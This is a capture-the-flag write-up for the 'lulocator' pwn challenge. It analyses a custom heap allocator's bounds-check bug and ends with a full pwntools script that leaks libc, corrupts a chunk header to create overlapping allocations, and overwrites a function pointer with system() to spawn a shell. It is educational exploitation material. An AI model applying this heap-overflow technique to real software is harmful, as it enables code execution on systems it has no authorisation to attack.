lulocator
Challenge
"Who needs that buggy malloc? Made my own completely safe lulocator."
We are given a stripped ELF 64-bit binary with a custom heap allocator backed by mmap, along with the challenge libc. The binary has No PIE, No RELRO, No Canary, and NX enabled.
Binary Analysis
The program provides a menu with 7 operations:
- new - Allocates an object with a custom allocator, stores pointer in a slots array (max 16 slots)
- write - Reads data from stdin into an object's data buffer
- delete - Frees an object and NULLs its slot
- info - Prints the object's address, output stream pointer (stdout), and length
- set_runner - Stores a slot's object pointer into a global
runnervariable - run - Calls
runner->func_ptr(runner + 0x28)(function pointer stored at offset 0x10 of the object) - quit - Exits
Object Layout (at address returned by allocator)
| Offset | Size | Field |
|---|---|---|
| +0x00 | 8 | field0 (unused, init to 0) |
| +0x08 | 8 | field1 (unused, init to 0) |
| +0x10 | 8 | func_ptr (initialized to a print function at 0x401608) |
| +0x18 | 8 | output stream (FILE* stdout) |
| +0x20 | 8 | length (user-requested size) |
| +0x28 | N | user data buffer |
Custom Allocator
- Arena: 0x40000 bytes allocated via
mmap(PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON) - Bump allocation for new chunks, doubly-linked circular free list for freed chunks
- Chunk header: 8 bytes before the data area, stores
aligned_size | in_use_bit - Aligned size =
align_up(request_size + 8, 16)with minimum 0x28 - Free list has integrity checks (corrupted free list detection, double-free detection)
Vulnerability: Heap Buffer Overflow
The write command has a bounds check bug. It allows writing up to obj->length + 0x17 (23 extra) bytes into the data buffer at obj + 0x28, but the actual allocated data area may be smaller than that, depending on alignment.
// Pseudocode of the bounds check
if (user_len >= obj->length + 0x18) // reject
puts("too long");
When the allocation size is perfectly aligned (e.g., size % 16 == 0), there is zero padding, and the full 23 bytes overflow into the adjacent chunk. This overflow covers:
- 8 bytes of the next chunk's size header
- 15 bytes of the next chunk's object fields (offsets 0x00 through 0x0E)
Exploitation Strategy
The key insight is that by corrupting an adjacent chunk's size header, we can create overlapping allocations when the chunk is freed and reallocated.
Step-by-Step
- Allocate three adjacent chunks A (slot 0), B (slot 1), C (slot 2), each with size 0x10
- Leak libc via
info(0)- theoutfield at obj+0x18 contains a pointer tostdout(a libc address:_IO_2_1_stdout_). Computelibc_baseandsystem()address. - Set runner to C via
set_runner(2)- the global runner variable now holds C's address - Write "/bin/sh\0" to C - this goes to C+0x28, which
run()will later pass as the argument to the function pointer - Overflow from A into B's chunk header - write 16 bytes of padding +
p64(0x101)to change B's apparent chunk size from 0x40 to 0x100 (with in_use bit set) - Free B - the allocator now believes B is a 0x100-byte free chunk, much larger than its actual 0x40 bytes
- Allocate D (size 0x20) - the allocator finds B's "large" free chunk and allocates from it. The allocation takes the first 0x50 bytes, and the allocator splits the remainder (0xB0 bytes) into a new free chunk starting at C+0x08. This remainder overlaps with C's object fields.
- Write through D to overflow into C's memory. D's user data starts at offset 0x28 from D. C's function pointer (C+0x10) is exactly 40 bytes from D's user data start. We write: 32 bytes of D's data + 8 bytes padding + 8 bytes of
system()address. This overwrites C+0x10 (the func_ptr) withsystem. - Call run() - this executes
runner->func_ptr(runner + 0x28)which is nowsystem("/bin/sh"), giving us a shell.
Memory Layout Diagram
Before corruption:
[A header][A object (0x38 bytes)][B header][B object (0x38 bytes)][C header][C object]
base+0 base+8 base+0x40 base+0x48 base+0x80 base+0x88
After step 5 (overflow from A):
[A header][A data... AAAA...][0x101 ][B object ][C header][C object]
^corrupted B header (was 0x41)
After step 7 (alloc D from "big" B):
[A chunk ][D header][D object (0x48 bytes) ][remainder hdr][remainder...]
^base+0x90 = C+0x08
^C+0x10 = func_ptr (in remainder)
After step 8 (write through D):
D's write data: [DDDDD...32 bytes...][00000000][system_addr]
Lands at: D+0x28 C+0x08 C+0x10 (func_ptr!)
Exploit Code
from pwn import *
p = remote('chall.ehax.in', 40137)
libc = ELF('./libc.so.6', checksec=False)
# Helper functions for menu interaction
def new(sz):
p.sendlineafter(b'> ', b'1'); p.sendlineafter(b'size: ', str(sz).encode()); return p.recvline()
def write_data(idx, data):
p.sendlineafter(b'> ', b'2'); p.sendlineafter(b'idx: ', str(idx).encode())
p.sendlineafter(b'len: ', str(len(data)).encode()); p.sendafter(b'data: ', data); return p.recvline()
def delete(idx):
p.sendlineafter(b'> ', b'3'); p.sendlineafter(b'idx: ', str(idx).encode()); return p.recvline()
def info(idx):
p.sendlineafter(b'> ', b'4'); p.sendlineafter(b'idx: ', str(idx).encode()); return p.recvline()
def set_runner(idx):
p.sendlineafter(b'> ', b'5'); p.sendlineafter(b'idx: ', str(idx).encode()); return p.recvline()
new(0x10); new(0x10); new(0x10) # A=slot0, B=slot1, C=slot2
stdout_addr = int(info(0).split(b'out=')[1].split(b' ')[0], 16)
libc_base = stdout_addr - libc.symbols['_IO_2_1_stdout_']
system_addr = libc_base + libc.symbols['system']
set_runner(2) # runner -> C
write_data(2, b'/bin/sh\x00') # C+0x28 = "/bin/sh"
write_data(0, b'A'*0x10 + p64(0x101)) # corrupt B header: size=0x100
delete(1) # free "big" B
new(0x20) # D=slot1, overlaps C
write_data(1, b'D'*0x20 + p64(0) + p64(system_addr)) # overwrite C+0x10 = system
p.sendlineafter(b'> ', b'6') # run() -> system("/bin/sh")
p.interactive()